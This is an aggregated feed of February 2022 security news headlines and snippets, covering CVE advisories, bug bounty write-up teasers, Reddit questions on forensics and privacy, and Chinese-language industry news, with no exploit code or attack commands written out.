    Solving Dojo’s geolocation quiz
    One day, when I was surfing the internet, my Twitter pushed me a tweet. Let's see what the tweet says: Continue reading on Medium »  ( 2 min )
    OSINT Tool - CarNet.ai
    The best tool to (correctly!) identify a vehicle’s brand and model using AI. Continue reading on Medium »  ( 2 min )
  • Open

    Why should you not send sensitive data over email
    Currently the company I work for sends sensitive documents over email. They password protect them but then send the password also using email format. submitted by /u/Linux98 [link] [comments]  ( 3 min )
    Is it safe to send my SSN over email to a Loan officer email, since she will need it to open up my credit report?
    My mom and I are in the process of trying to buy an apartment together. Mom will put it under my name. This is the first time I'm doing this and she told me I needed to email my SSN to the loan officer. I have protonmail which is secure mail and is encrypted email. Would it be safe to send my SSN over email to the loan officer in this case since she would need it to open my credit report? I do not know if the loan officer's email is encrypted or not. Or should I give her my SSN in another way such as telling her on a phone call to be on the safe side? Or would email be just fine? submitted by /u/Wastedmess [link] [comments]  ( 3 min )
    Regarding changing passwords and NIST (My google-fu is failing me)
    NIST states in NIST Special Publication 800-63B under section 5.1.1.2 Memorized Secret Verifiers that: "Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator. " I'm a real stickler and was wondering if anyone knows what main research papers or investigations made them come to the recommendations above? Additionally are there any respected research authority on these type of questions in IT-sec? Thanks! submitted by /u/someuserman [link] [comments]  ( 3 min )
    Company Phone in Sealed Box - Possible to be Monitored?
    Just got my company phone and it’s brand new in the sealed manufacturers box and even has the carriers sticker on it still. Is there any possible way my company could be monitoring my activity on this phone beyond the calls being made and quantity of texts/data usage? submitted by /u/sektrONE [link] [comments]  ( 3 min )
  • Open

    Self-Testing: Red Team Augmentation
    Red Team testing and Penetration testing are key controls to utilize as part of maintaining a mature security program. There is the… Continue reading on Medium »  ( 5 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    Zabbix SAML Authentication Bypass (CVE-2022-23131) and more
    Article URL: https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage/ Comments URL: https://news.ycombinator.com/item?id=30372198 Points: 2 # Comments: 0  ( 9 min )
  • Open

    T2 Mac security vulnerability means passwords can now be cracked
    Article URL: https://9to5mac.com/2022/02/17/t2-mac-security-vulnerability-passware/ Comments URL: https://news.ycombinator.com/item?id=30374224 Points: 32 # Comments: 6  ( 4 min )
  • Open

    Top 10 API Bugs — Where To Find Them
    Ladies and Gentlemen, let’s do some API hacking today. I will discuss some of the top 10 API bugs and where one can find them. Continue reading on Medium »  ( 5 min )
    403 forbidden bypass & Accessing config files using a header
    This is my first writeup on how i bypass 403 & accessed the config file Continue reading on Medium »  ( 1 min )
    Beginner’s Guide to Bug Bounty Hunter
    How much money can you make as a bug bounty hunter? That’s the burning question on everyone’s mind, and it’s one that will take some time… Continue reading on Medium »  ( 3 min )
    Apple pays $100,500 to a student who discovered Mac webcam vulnerability
    Ryan Pickren, a cyber security student was awarded $100,500 (around 75 lakhs) as a bounty, after he showed Apple how a vulnerability… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Should You Go Full-Time?
    In the comments, I was asked what turned out to be more profitable in terms of money as a result — my previous job as a developer or… Continue reading on Medium »  ( 2 min )
  • Open

    Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed - Your Lifetime API Key!
    Hi, everyone, This is Dancho. Big news! I've decided to make approximately 15 years of active and unique threat actor specific research publicly accessible online for free using the OpenCTI STIX STIX2 TAXII platform and not only convert all the cool and juicy and full of never-published and discussed before niche threat actors both internationally and in Russia but also make them into a free STIX STIX2 TAXII threat intelligence feed and turn them into a machine readable format with the idea to centralize and speed up the communication of my research and potentially allow you to better catch up improve your situational awareness and learn new things about the international bad guys including the bad guys in Russia including their Internet infrastructure and catch up with who they are and w…
  • Open

    Learning secrets management in the modern world using OWASP WrongSecrets Project : Hands-on Labs, CTF style challenges
    submitted by /u/madhuakula [link] [comments]  ( 1 min )
    Exploiting Jenkins build authorization
    submitted by /u/Alternative_Tour9985 [link] [comments]
    Tutorial: Kubernetes Vulnerability Scanning & Testing KubiScan & KubeSploit
    submitted by /u/jat0369 [link] [comments]
    CVE-2022-23131 - Zabbix SAML Authentication Bypass
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    Advisory: Cisco RV340 Dual WAN Gigabit VPN Router (RCE over LAN)
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
  • Open

    SecWiki News 2022-02-17 Review
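    A large-scale study of malicious plugins in the WordPress ecosystem by Avenger; 2021 Industrial Control Network Security Situation White Paper by ourren; For more of the latest articles, visit SecWiki  ( 2 min )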
  • Open

    Avoiding Mixed Content Errors with an HTTPS Python Server
    Disclaimer: To set up a secure Python server, we need a domain name that we can access. 1. Introduction At some point during penetration testing, bug hunting, and capture the flag competitions, we will likely need to download a file or send a request to a server that we can access. Depending on what we... The post Avoiding Mixed Content Errors with an HTTPS Python Server appeared first on TrustedSec.  ( 9 min )
  • Open

    Subdomain Takeover of brand.zen.ly
    Zenly disclosed a bug submitted by mega7: https://hackerone.com/reports/1474784 - Bounty: $750
    Missing SPF record on trycourier.app
    Courier disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1416701
  • Open

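    Analysis and research of the Weblogic HomeHandle deserialization vulnerability
    This article is mainly a detailed analysis and study of CVE-2022-21350, for the purpose of discussing security techniques.  ( 1 min )
    US says Russian state hackers compromised defense contractors
    According to reports, Russian hacking groups have launched sustained attacks against US CDCs.  ( 1 min )
    Watch out: the upcoming Chrome and Firefox 100 may carry serious risks
    The upcoming Firefox 100 and Chrome 100 browser versions carry a serious risk: websites may break when parsing user-agent strings that contain a three-digit version number.  ( 1 min )
    schoolcms code audit
    I have been studying the thinkphp framework lately; today I picked a CMS to audit and found two injection points, which I analyze here.  ( 1 min )
    Will machine learning become a new threat and backdoor for data security?
    Experts who study the security of machine learning and AI systems warn that such systems may be exploited by skilled attackers in the future.  ( 1 min )
    FreeBuf Morning News | US says Russian hackers breached multiple Department of Defense contractors; Trickbot targets customers of 60 well-known companies
    The International Committee of the Red Cross (ICRC) recently suffered a cyberattack in which the data of more than 515,000 "highly vulnerable people" was leaked; it was most likely the work of state-backed hackers.  ( 1 min )
    Is heavy pixelation safe? A new technique can recover text from pixelated images
    This week, the lead researcher at security firm Bishop Fox clearly recovered the letters from a pixelated image of text.  ( 1 min )
    The 10 hottest XDR security companies to watch in 2022
    Note: this article is reposted from SDNLAB, for reference only. According to research firm Forrester, the extended detection and response (XDR) market is still at an early stage, and existing  ( 1 min )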
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )

  • Open

    Broken Authentication Session Token Bug
    Courier disclosed a bug submitted by the_hacker_girl: https://hackerone.com/reports/948345
  • Open

    Company refuses to provide any training for our SOC
    Since joining multiple analysts have requested some type of training whether it’s vendor specific for tools like the SIEM or vendor neutral training such as SANS but management keeps saying our department is “self-taught” and there is no training budget. Which is odd considering how big of a corporation it is and how successful it is. Personally I’m shocked as the companies I’ve worked for in the past all provided some type of training. How can I make a compelling case for getting our SOC analysts training? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    what are some affordable and credible penetration testing certifications?
    I am a new penetration tester and I want to gather some certifications for me to be able to further my career. However I have observed that cybersecurity certifications are particularly expensive, so like the Certified Ethical Hacker (CEH) certification costs 1200 USD which is a lot since I am planning to pay them by myself. I recently saw elearnsecurity, particularly the eJPT and it only costs 200 USD which I think is great since it shows that I have some real world and hands on capabilities as a penetration tester. So are there any other certifications like the eJPT which is affordable and credible? Preferably around the same or better if lower price than the eJPT. Thank you submitted by /u/darkalimdor18 [link] [comments]  ( 3 min )
    Book recommendations
    Looking for some good books to study up on foundational Network Concepts and maybe some stuff that could help me prepare for Network+ submitted by /u/Wintermane45 [link] [comments]
  • Open

    What makes a great incident response engineer?
    submitted by /u/Real_Score_5035 [link] [comments]  ( 1 min )
    QUESTION: confiscated phone asks to update whatsapp
    Good afternoon, My local department wants to manually check whatsapp messages on a phone. The phone has been in flight mode since we've confiscated it. We ran into the issue that when we want to launch whatsapp it asks to update the whatsapp software. If we want to do this this means that we'll have to hook it up to our wifi network. Does this mean that if the suspect has deleted his messages through whatsapp.web / other phone that this will also be synched with the whatsapp on the phone? I also believe that whatsapp is linked to a phone number. So it would rather be impossible for the suspect to get on his whatsapp without his sim-card (this is in our possession as well). We also use the UFED cellebrite, but whatsapp conversations don't always come through. So what are our options to be able to get back into whatsapp without loss of data? Thanks! submitted by /u/Tniso [link] [comments]  ( 1 min )
  • Open

    Adobe Patches Critical RCE Vulnerability in Magento2
    On Sunday, February 13th, Adobe pushed an emergency update to their Magento2 ecommerce software patching a critical unauthenticated remote code execution vulnerability. It is marked as CVE-2022-24086 with a CVSS score of 9.8. Website administrators of Magento stores should patch immediately. Shop owners of Magento 2.3 or 2.4 stores can find the patch to install here. Instructions on how to install Magento security patches via Composer can be found here. Our website firewall generic rules block RCE exploitation attempts by default but given the severity of the vulnerability website administrators should not leave their websites unpatched. Continue reading Adobe Patches Critical RCE Vulnerability in Magento2 at Sucuri Blog.
  • Open

    Lodestar Joins the Consensus Layer Bug Bounty
    ChainSafe is happy to announce that we’ve been added to the Ethereum Foundation’s consensus layer bug bounty program for Lodestar, our… Continue reading on ChainSafe »  ( 1 min )
    File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    Bug Report; Bypassing Weekly Limits In Basic (Free) LinkedIn Account
    Publishing my first Security Vulnerability report for LinkedIn.Below is the report that I have submitted to LinkedIn Information Security… Continue reading on Medium »  ( 2 min )
    Hacked Dutch Government Website. All I got was this l̶o̶u̶s̶y̶ cool T-Shirt.
    They are right. Persistence is the key ! Continue reading on Medium »  ( 1 min )
    What is CSRF Attack ?
    Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they… Continue reading on Medium »  ( 2 min )
    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    ImmuneFi and Octopus Network Launch a Juicy Bug Bounty
    Octopus Network 🐙 Continue reading on Medium »  ( 3 min )
  • Open

    ‘Ice phishing’ on the blockchain
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-16 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Machine Learning Enrichment in your Data Asset Production Flow
    How discursus tackled the challenge of introducing ML enrichments in data asset production flows, using Dagster, dbt and Novacene AI. Continue reading on discursus.io »  ( 5 min )
    Power of Reverse Image Search — OSINT Challenge 16
    On Dec 22, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. Continue reading on Medium »  ( 1 min )
  • Open

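    How to do security R&D talent recruitment well: how to hire
    People are stubborn creatures; most find it hard to change their ingrained mindset once they are adults. From this angle, selection matters more than training.
    Ukraine under the shadow of "large-scale hybrid warfare"
    On the "day war was to begin", the cctv13 broadcast showed no bloody scenes of large-scale war, and both Russia and Ukraine seemed to have fallen silent.  ( 1 min )
    FreeBuf Morning News | Ukrainian military agencies and banks hit by cyberattacks; Singapore to roll out strong anti-scam measures
    Starting on the afternoon of February 15, 2022, Ukraine's Ministry of Defense and Armed Forces, as well as state-owned banks, came under DDoS attack  ( 1 min )
    Online plus offline, fully covered! A first look at the "new format" of the CIS 2021 conference, spring edition
    Hello to all FreeBuf friends old and new, the CIS 2021 agenda topics are here!  ( 1 min )
    A slap in the face: Internet Society data leak
    As a body that develops and promotes standards for the internet and takes advancing the internet as its mission, it has nonetheless suffered an information leak caused by a security flaw, which is rather embarrassing.  ( 1 min )
    Yak basic plugin case study: CDN detection
    A content delivery network (CDN) is a system of computer networks interconnected over the internet. This article starts with CDNs and CDN configuration, then walks through a Yak basic plugin case in detail.  ( 3 min )
    New ransomware Coffee lies dormant for up to a hundred days; 360's Decryption Master exclusively supports decryption
    Recently, 360 Security Brain monitoring found that Coffee, a new ransomware with worm-like properties, poses a risk of spreading widely.
    Survey shows zero trust strategy is well received by CSOs
    Implementing zero trust serves as an effective way to reduce cyber risk.  ( 1 min )
    Swissport hit by BlackCat ransomware attack
    Swiss airport services company Swissport was hit by a ransomware attack that for a time caused flight delays and service disruptions.
    Ukrainian banks and military agencies suffered DDoS attacks
    Yesterday afternoon, Ukraine's Ministry of Defense and Armed Forces, along with two of the country's state-owned banks, were hit by distributed denial-of-service (DDoS) attacks.
    Job-hopping monitored by your company from every angle? The lid can finally no longer be kept on
    With relevant domestic laws and regulations taking effect and the public's awareness of privacy protection awakening, the lid can finally no longer be kept on. Now that it has been lifted, we need to re-examine the issue.  ( 1 min )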
  • Open

    The Ultimate Secret To Red Team Engagements
    The key to a successful engagement is well-coordinated planning and communication through all parties involved. This blog post would focus… Continue reading on Medium »  ( 1 min )
    Here is how you can become an ethical hacker
    Ethical hackers are experienced professionals who find exploitable bugs and report to increase the cybersecurity posture of an… Continue reading on Medium »  ( 1 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and techniques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    Almost every publicly available CVE PoC
    Article URL: https://github.com/trickest/cve Comments URL: https://news.ycombinator.com/item?id=30357373 Points: 104 # Comments: 14  ( 3 min )
  • Open

    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30357335 Points: 2 # Comments: 0  ( 9 min )
  • Open

    How can I download a React site to edit it locally?
    I have done this before with wget and had no problems, however, I am trying to download this react app and am having a very hard time. For some reason it is only downloading the index.html page and when I click on another tab I get "GET /example" Error (404): "Not found" However, when I run wget on the /example page and grab example.html then it works, but this is not feasible for every page that I need to run. I am calling: wget --random-wait -r -p -e robots=off -U mozilla https://example.com What am I doing wrong / is there a better tool to do this? The site is hosted on Vercel and uses the Next.js framework Any help is much appreciated :) submitted by /u/tokentrader [link] [comments]  ( 2 min )
  • Open

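    An Analysis of the Hacking Group TA2541
    Translator: Knownsec 404 Lab translation team. Original link: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight Key findings: Proofpoint researchers have for years been tracking a persistent cybercrime actor targeting the aviation, aerospace, transportation, manufacturing, and defense industries. The actor consistently uses remote access trojans (RATs), which can be used to remotely control infected machines. The hackers focused on ...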

  • Open

    Why would a civilian private network be using a public IP range internally for device assignments (military netblock at that)?
    I was visiting a popular big box store today and was looking at one of their WiFi printers and saw this: https://imgur.com/a/fTZ1Emc Any idea why they are using a public ip range instead of something internal like 192, 172, 10 etc for IP assignments? The netblock according to ARIN belongs to the DoD (https://whois.domaintools.com/7.117.1.1) Just to make sure it wasn't a fluke, I also looked at another device on their network which also had a 7.117 IP. I just thought it was very strange. Any ideas? submitted by /u/LyleTillman [link] [comments]  ( 2 min )
    What's the Biggest Turn Off in Regards to Offensive Frameworks?
    I'm referring to software such as Metasploit, CobaltStrike, Armitage, Ramcos, etc.... submitted by /u/Blagojee [link] [comments]  ( 1 min )
    Burp Suite certificate question
    I was wondering if anyone has recently done their burp suite practitioner exam cert recently and how relatable it is to their practice test? Is burp suite pro REALLY necessary for the test? Just curious because it's for work and I don't want to pay for pro to not use it. My work has boxes setup with pro so my personal license won't be utilized except for the test. submitted by /u/phishingsudo [link] [comments]  ( 1 min )
    Is it possible to route ALL traffic from an idevice through a VPN?
    I'm somewhat new to idevice admin, so please excuse any ignorance. Is it possible to route literally ALL packets from an iPhone through a VPN? We're trying to get some stuff set up and we implemented a VPN by way of a user-installable app. Unfortunately it seems that on iOS there are a lot of connections that bypass this. For example when first connected to a wifi network the iPhone spams a flurry of connections to Apple's servers which don't go through the VPN. I've confirmed this by creating an "evil" wifi network that supports ipv4 only and blocks any connections to the 17.x.x.x range (which is wholly owned and operated by Apple), and even with the VPN active the logs show hundreds of connection attempts persistently. If I also block all Apple domains then half the stuff on the phone no longer works. App-based connections are routed correctly (Safari, etc), but the phone completely ignores the VPN for both DNS lookups and the connections themselves when it comes to system stuff and I'm not sure why. From my research it seems that maybe we need to ditch the app idea and instead implement an "always on" VPN by way of a mobileconfig file. This appears to require the iPhones to be supervised through MDM, which isn't a problem. I've taken a test phone, wiped and supervised it, but I'm having trouble figuring out how to create a mobileconfig that does what we want. Before I burn too many hours messing with this I'm wondering if anyone can help with the following two questions: Will an "always on" VPN on an iPhone actually route ALL packets through the VPN (including the system level phone-home initialization stuff, DNS lookups, ntp, etc) or is this not even the right approach? Assuming (1) is the correct approach, can someone point me to an example mobileconfig file that implements this so I can look at the structure and have a better idea of what I'm doing? submitted by /u/sneakertech [link] [comments]  ( 2 min )
    What are my options for an encrypted bootable flash drive containing 2 Linux OS, selection of which would be done by password alone at the bootloader / pre-boot stage.
    I want an encrypted bootable flash drive which contains 2 LINUX OS. The existence of either OS should be impossible to determine without a password. The flash drive should boot to a BOOTLOADER password prompt. Entering a wrong password should do nothing. Entering password A should boot OS A. Entering password B should boot OS B. After boot of A, it should not be possible to prove the existence of B. After boot of B, it should not be possible to prove the existence of A (i.e. if, by booting one of the OS, it is then possible to see that half the flash drive is 'unallocated' then we have probably failed our task). You're already thinking 'plausible deniability' is the phrase I'm looking for. Yes you're right - that's exactly what I want. I want what Veracrypt can do, but I want it for Linux, not Windows. Is it possible? I've looked at LUKS, but I don't see that it can do what I want. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]  ( 1 min )
    Is law enforcement/fed/military experience pretty much mandatory to become good at DFIR?
    We can say you can self study, learn all the material, join a SOC and pray for a promotion, get certifications, etc. I don't see a whole ton of jobs open for DFIR without explicit mention of tools, processes, and experience that one would have to accumulate in one of those sectors that isn't gated by 5-10 years of experience doing it. Additionally, it seems to me that most of the people who are pumping out books and learning material come from some kind of government background where they did incident response. Almost all hiring managers I've met have significant LE experience behind them. What I see much more of is people without this govt background going into pentesting, policy work, etc. Are you pretty much screwed for getting into DFIR at a large corp without a three letter agency or military on the resume? submitted by /u/Different-Area-3053 [link] [comments]  ( 2 min )
    Forensics Toolkits Recommendations? GCP Linux VM may have been compromised and used for crypto mining :/
    Hey y'all! I have a VM that was flagged by Google for potential compromise and being used for crypto mining (the CPU was flat out 50%, continuously for last several days). I immediately took down the machine, snapshotted and imaged it; rotated all security keys for GCP account. I don't think there is any nefarious activity and the compromise was likely to this one machine (or maybe I think that). I would like to find a tool that can show me last logins, various logs, any suspicious software etc. so that I can start digging or escalate. What tools, if any, would you recommend? I have been running individual commands like last, utmpdump, scrubbing logs manually but I figured there has to be a tool to make this easy. submitted by /u/sidgup [link] [comments]  ( 2 min )
  • Open

    H1.Jack, The Game
    As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers! We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourselves to improve the craft. During the fall of 2019, we embarked on a pretty ambitious goal despite virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of our 2020 spare time working on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses. Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play game with no advertisements. We hope you’ll enjoy the game in between your commutes and lunch breaks! Android: https://play.google.com/store/apps/details?id=com.CobbleGames.Hijack iOS (iPhone and iPad): https://apps.apple.com/app/hijack-game/id1517609205 No malware included. H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame on gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough! While playing, you might end up talking to John or Luca. Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:  ( 1 min )
  • Open

    How do I secure WordPress Websites for Free?
    Protecting Content Management Systems (CMS) installed on a hosting server is crucial in today’s ever-growing world wide web, but how do I protect my WordPress website on a tight budget? There are tons of options available on this front, but it can be overwhelming to make the right decision in website protection that fits into your budget. In this article, however, we’ll be covering the basics of efficiently securing your WordPress website at no cost.  Continue reading How do I secure WordPress Websites for Free? at Sucuri Blog.
  • Open

    ImmuneFi Bug Bounty Launched!
    Octopus Network is a brand new multichain network born to serve application-specific blockchains, aka appchains. Octopus Network provides… Continue reading on Octopus Network »  ( 2 min )
    Yet another enumeration of subdomains with statistics
    Or how to collect millions of bug bounty subdomains in order to make a few wordlists. Continue reading on Medium »  ( 1 min )
    Do you want to start your career in Cyber Security — Read This.
    Cyber Security - Learn hack Secure. Continue reading on Medium »  ( 3 min )
    100 Days of Hacking — Day 10
    What’s up guys it’s the 10th day of #100DaysofHacking. 10% of the goal is achieved let’s go through today’s objectives and report Continue reading on Medium »  ( 2 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much! Continue reading on Medium »  ( 3 min )
    HigherLogic RCE In _VSTATE .NET
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    PORTSWIGGER WEB SECURITY - FILE UPLOAD LAB SOLUTIONS
    File upload is when a user uploads a file to a web server. Web pages, for the user to upload files… Continue reading on Medium »  ( 10 min )
    Jax.Money testing: rewards up to $20,000 and more!
    by Ramyata Rao, Digital Marketing Manager at Jax.Network Continue reading on Jax.Network Blog »  ( 4 min )
    How Did I Start Doing Bug Bounty?
    Since school, I have been reading Hacker (the Russian offensive security magazine) when I had the opportunity to buy it (then it was still… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Low Hanging Fruit
    Low-hanging fruit are bugs that are very easy to find. I would divide them into 2 more types. Continue reading on Medium »  ( 1 min )
  • Open

    A technique to semi-automatically discover new vulnerabilities in WordPress plugins
    submitted by /u/kazetkazet [link] [comments]
    GoIP-1 GSM gateway could be harnessed for phone fraud by hackers
    submitted by /u/ValtteriLe [link] [comments]
    Dependabot alternative for Clojure
    submitted by /u/mthbernardes [link] [comments]
    CVE-2021-44521 – Exploiting Apache Cassandra User-Defined Functions for Remote Code Execution
    submitted by /u/SRMish3 [link] [comments]
    A CLI SAST (Static application security testing) tool which was built with the intent of finding vulnerable Clojure code via rules that use a simple pattern language.
    submitted by /u/mthbernardes [link] [comments]  ( 1 min )
    merOS-virt - Build and Interact with a Set of Virtual Machines.
    submitted by /u/AranAilbhe [link] [comments]  ( 2 min )
    Advisory: Western Digital My Cloud Pro Series PR4100 RCE
    submitted by /u/g_e_r_h_a_r_d [link] [comments]  ( 1 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Google Rewards Indian Techie With $8.7M in vulnerability rewards
    Article URL: https://www.indiatimes.com/technology/news/google-thanks-indian-researcher-android-chrome-bug-561975.html Comments URL: https://news.ycombinator.com/item?id=30349459 Points: 9 # Comments: 1  ( 2 min )
  • Open

    An OSINT Path — In TryHackMe
    Hello Friends, Continue reading on Medium »  ( 1 min )
    Honeypot — Seoul, South Korea (Threat Analysis)
    Hello! Continue reading on Medium »  ( 5 min )
    TryHackMe Sakura Room CTF Write-Up
    My weird, unexplainable urge to get OSINT Dojo's Student Rank Badge has led me to this CTF, and now that I'm here, I realize that I can… Continue reading on Medium »  ( 4 min )
    Hacktoria: Geolocation 13 (Walkthrough)
    Hacktoria: Geolocation 13 (Walkthrough) Continue reading on Medium »  ( 1 min )
  • Open

    Work From Home Productivity Tips
    For many of us, working from home is here to stay, but it does come with its own challenges. This article contains some of the best tips and tricks from TrustedSec consultants on how to stay focused at home. Set an alarm to start and stop working Alarms can be set in shorter intervals, to... The post Work From Home Productivity Tips appeared first on TrustedSec.  ( 3 min )
  • Open

    SecWiki News 2022-02-15 Review
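    The ultimate techniques for shrinking Java deserialization payloads by ourren; Explainable machine learning for solving network security problems by ourren; Starting from a Pegasus false positive by Avenger; Some thoughts on bypassing taint analysis by ourren; 2021 Online Financial Black Market Research Report by ourren. For more recent articles, visit SecWiki  ( 2 min )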
  • Open

    Question: Different imaging tools for acquisition
    I'm very new to computer forensics. Right now I'm exploring different data acquisition tools. I tried to image a USB device using FTK Imager (on a Windows system) and dd from the SIFT workstation (Linux). I noticed that: 1. These two imaging tools provide image data of different sizes. 2. FTK automatically verifies the hash of the device and the image - both hashes were the same. 3. For the dd image, I verified it by myself and they were the same. I have a few questions: 1. Why is the hash of the same device different on FTK (running on Windows) and when checking on the SIFT Workstation (Linux)? 2. If different tools provide different images, do analysts use a combination of multiple tools? 3. I read about write blockers, I did not use one while imaging, could the difference be because of this? I'd be grateful if you could help me understand more about this process by answering my questions or sharing more resources that I could use. Thanks! submitted by /u/nybble04 [link] [comments]  ( 4 min )
    Overview of autopsy data artifacts, analysis results, and reporting. Part 2 of the autopsy series. nmap usage investigation as a case study.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    iCloud forensics
    Does anyone have any experience recovering permanently deleted iCloud data using Cellebrite? Or any other forensic tools? submitted by /u/Techn0prince [link] [comments]  ( 2 min )
    ENCE Certification
    Hi all, My EnCE cert is up in April 22 and I would like to maintain accreditation. Unfortunately my role has a focus towards E-Discovery and not so much digital forensics so I may struggle to get aid from my employer re training and financing. Does anyone have experience renewing? Are there any requirements for renewal? As I am likely having to purchase the training myself I don't want the training to be too expensive (particularly as it's not a skill I use day to day). I would likely benefit the most from Cellebrite or AXIOM training. TIA submitted by /u/Genzlol [link] [comments]  ( 1 min )
  • Open

    New Emotet Infection Method
    A new Emotet infection method uses an obfuscated Excel 4.0 macro that, when activated, leads to the retrieval and execution of the final Emotet payload. The post New Emotet Infection Method appeared first on Unit42.
  • Open

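    Interview with Jidun (极盾) technical director Zheng Dongdong: what can the red-hot XDR bring to enterprises?
    Where exactly does the appeal of XDR security technology lie, and which problems can the much-anticipated XDR technology solve?  ( 1 min )
    FreeBuf Morning News | US critical infrastructure organizations breached by ransomware again; European Central Bank asks banks to strengthen cyber defenses
    As the Ukraine crisis escalates, the European Central Bank has warned banks that they may face Russia-linked cyberattacks and asked them to strengthen their cyber defenses.  ( 1 min )
    2021 Online Financial Black Market Research Report
    With the latest wave of fintech development and industry change, the financial sector has accelerated its digital transformation; flexible and convenient financial business models give users better financial services but also face all kinds of new attack threats from a constantly evolving underground industry.  ( 1 min )
    A US company exposed the data of 7 million users
    An insecure Amazon S3 bucket contained the personal data of about 7 million people.  ( 1 min )
    Sports brand Mizuno hit by ransomware attack, delaying orders
    Sports equipment and apparel brand Mizuno suffered a ransomware attack on February 4. The attack severely disrupted the company's business.
    Europe's largest car dealer hit by ransomware attack, Google urgently fixes zero-day vulnerability | Global cybersecurity highlights for February 15
    Emil Frey, one of Europe's largest car dealers, was hit by a ransomware attack last month; the Swiss company appeared on the Hive ransomware victim list on February 1.  ( 1 min )
    Announcement on changes to the format of the CIS 2021 Spring edition event
    Combining new in-person and online formats, the CIS 2021 Spring edition looks forward to seeing you there.  ( 1 min )
    The Cybersecurity Review Measures take effect today; platforms with user information at the million scale must undergo review before listing abroad
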